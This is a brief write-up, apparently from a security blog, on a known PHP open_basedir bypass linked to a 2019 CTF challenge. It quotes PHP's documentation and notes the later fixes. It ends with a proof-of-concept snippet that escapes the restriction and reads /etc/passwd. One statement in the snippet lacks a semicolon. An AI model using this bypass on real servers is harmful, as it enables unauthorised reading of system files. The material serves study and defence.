This one was burned by Blaklis in 2019, by being the expected solution for his Phuck3 challenge for InsomniHack Finals 2019, but has been known long before.
In the words of PHP's documentation on open_basedir:
When a script tries to access the filesystem, for example using include, or fopen(), the location of the file is checked. When the file is outside the specified directory-tree, PHP will refuse to access it. All symbolic links are resolved, so it's not possible to avoid this restriction with a symlink. If the file doesn't exist then the symlink couldn't be resolved and the filename is compared to (a resolved) open_basedir.
[…]
open_basedir is just an extra safety net, that is in no way comprehensive, and can therefore not be relied upon when security is needed.
It has been more or less fixed in March 2021, then again in March 2023, and again in July 2023. But I wouldn't be surprised if more low-hanging bypasses were lurking ;)
The crux of the bypass is that php didn't resolve relative paths both in
ini_set and when checking php_check_open_basedir:
<?php
echo ini_get('open_basedir'); // /var/www/html
mkdir('./tmp');
chdir('./tmp');
ini_set('open_basedir', '..');
for ($i = 1; $i <= 24; $i++) {
chdir('..');
}
ini_set('open_basedir','/')
echo file_get_contents("/etc/passwd");